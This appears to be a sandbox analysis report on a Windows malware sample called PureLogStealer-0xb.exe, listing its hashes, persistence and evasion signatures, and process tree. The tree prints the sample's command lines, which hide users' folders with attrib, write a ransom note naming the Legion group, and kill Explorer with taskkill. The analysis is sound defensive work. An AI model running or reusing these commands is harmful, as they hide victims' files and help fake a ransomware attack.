Overview

overview

10

Static

static

3

PureLogSte...xb.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 01:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PureLogStealer-0xb.exe

  • Size

    193KB

  • MD5

    98609581725d9cf7f5200dbb02266cd6

  • SHA1

    5f8a127fb69172947c6212b3a466279794b702a4

  • SHA256

    01b57b7ab116a353b5d7d778b62c1a99f7f9f10e6af3a524aa13b9e3a588d751

  • SHA512

    1cfa89386dd206ba5be5a981f4942deb76b71f7dcc5a09f9cf605e87a0128983bce1a8d22300e08e0751321a47c6252575d93fa9d81e847944b2c9fc5aaa2d0d

  • SSDEEP

    6144:pS4OgfnRtcCUsnzUCpM69/KImQi/6ebl:srg/jcy

Score
10/10
defense_evasionpersistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 13 IoCs
    persistence
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
    defense_evasion
  • Kills process with taskkill 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
    "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4940
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:5104
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:1168
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5248
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:3796
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1688
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:3556
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1864
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5828
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2420
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2980
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:3256
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:4252
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5012
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" -startup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5224
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe -startup
      2⤵
        PID:2044
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5200
      • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
        C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
        2⤵
          PID:4880
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --init
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:6104
        • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
          C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --init
          2⤵
            PID:4708
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" /setup
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:5824
          • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
            C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe /setup
            2⤵
              PID:4624
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --wininit
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:5432
            • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
              C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --wininit
              2⤵
                PID:540
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c AWindowsService.exe
              1⤵
                PID:4816
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskhost.exe
                1⤵
                  PID:4824
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c windowsx-c.exe
                  1⤵
                    PID:4844
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c System.exe
                    1⤵
                      PID:4828
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c _default64.exe
                      1⤵
                        PID:4888
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c native.exe
                        1⤵
                          PID:5008
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ux-cryptor.exe
                          1⤵
                            PID:4764
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c crypt0rsx.exe
                            1⤵
                              PID:5140

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PureLogStealer-0xb.exe.log
                              Filesize

                              1KB

                              MD5

                              2d2a235f1b0f4b608c5910673735494b

                              SHA1

                              23a63f6529bfdf917886ab8347092238db0423a0

                              SHA256

                              c897436c82fda9abf08b29fe05c42f4e59900116bbaf8bfd5b85ef3c97ab7884

                              SHA512

                              10684245497f1a115142d49b85000075eb36f360b59a0501e2f352c9f1d767c447c6c44c53a3fb3699402a15a8017bdbd2edd72d8599fdd4772e9e7cb67f3086

                              Download Submit

                            • C:\Users\Public\Desktop\info-Locker.txt
                              Filesize

                              101B

                              MD5

                              08f3476d37aba1a9688406751a7ba732

                              SHA1

                              3818a248a30bc1344292b5feeb95c3fc38cbcadf

                              SHA256

                              08eb86f622bc923a02329ea5d3a7eea9781d1178abbd25fb1e8cac0d4babd934

                              SHA512

                              3df022e5cb9e93c7133c942e5a1cb425a349f2348d74af786a8789acd16b36fb7d95a19b635ff60d7507ad357e853810789dc48e0016a66ab1996af0dbeffc76

                              Download Submit

                            • memory/536-0-0x00007FFD4B4D3000-0x00007FFD4B4D5000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/536-1-0x0000000000ED0000-0x0000000000F06000-memory.dmp

                              Filesize

                              216KB

                              Download

                            • memory/536-2-0x00007FFD4B4D0000-0x00007FFD4BF91000-memory.dmp

                              Filesize

                              10.8MB

                              Download

                            • memory/536-20-0x00007FFD4B4D3000-0x00007FFD4B4D5000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/536-21-0x00007FFD4B4D0000-0x00007FFD4BF91000-memory.dmp

                              Filesize

                              10.8MB

                              Download